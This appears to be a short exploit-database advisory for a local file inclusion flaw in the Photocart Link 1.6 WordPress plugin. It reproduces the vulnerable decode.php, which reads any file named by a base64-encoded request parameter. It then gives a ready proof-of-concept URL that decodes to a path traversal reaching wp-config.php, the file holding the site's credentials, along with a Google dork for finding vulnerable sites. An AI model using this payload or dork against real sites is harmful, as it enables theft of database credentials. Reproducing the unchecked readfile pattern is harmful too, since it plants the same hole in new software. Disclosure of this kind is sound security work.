WordPress Photocart Link 1.6 Local File Inclusion
Posted on 30 November -0001
<HTML><HEAD><TITLE>WordPress Photocart Link 1.6 Local File Inclusion</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Wordpress Plugin Photocart Link - Local File Inclusion # Exploit Author: CrashBandicot @DosPerl # Date: 2016-03-27 # Google Dork : inurl:/wp-content/plugins/photocart-link/ # Vendor Homepage: https://fr.wordpress.org/plugins/photocart-link/ # Tested on: MSWin32 # Version: 1.6 # Vuln file : decode.php <?php error_reporting(0); header("Cache-control: private"); $new = base64_decode($_REQUEST['id']); header("Content-type: image/jpeg"); header("Content-transfer-encoding: binary "); header("Content-Disposition: filename=do_not_copy_these_images"); header('Cache-control: no-cache'); @readfile($new); ?> # PoC : /wp-content/plugins/photocart-link/decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA== # Right click -> Save As -> and Read with Notepad file Saved # 27/03/2016 - Vendor Informed about Issues </BODY></HTML>